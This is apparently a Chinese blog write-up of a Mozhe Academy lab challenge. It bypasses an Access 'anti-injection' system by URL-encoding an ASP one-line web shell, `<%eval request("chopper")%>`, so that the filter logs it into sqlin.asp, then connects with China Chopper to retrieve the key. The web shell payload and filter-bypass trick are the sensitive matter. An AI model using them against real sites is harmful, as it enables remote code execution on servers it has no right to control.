墨者学院 - SQL注入实战(防注入)-Access

版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/82384368

使用御剑扫描,发现sqlin.asp文件,打开发现是乱码

必应一下

access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话

在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了

用火狐浏览器的插件hackbar对一句话进行url encode的加密后再尝试,发现一句话被成功的记录到了sqlin.asp文件中

菜刀对   ip/sqlin.asp 进行连接,成功拿到key

菜刀连接  ip/sqlin.asp 密码为chopper

猜你喜欢

转载自blog.csdn.net/qq_42357070/article/details/82384368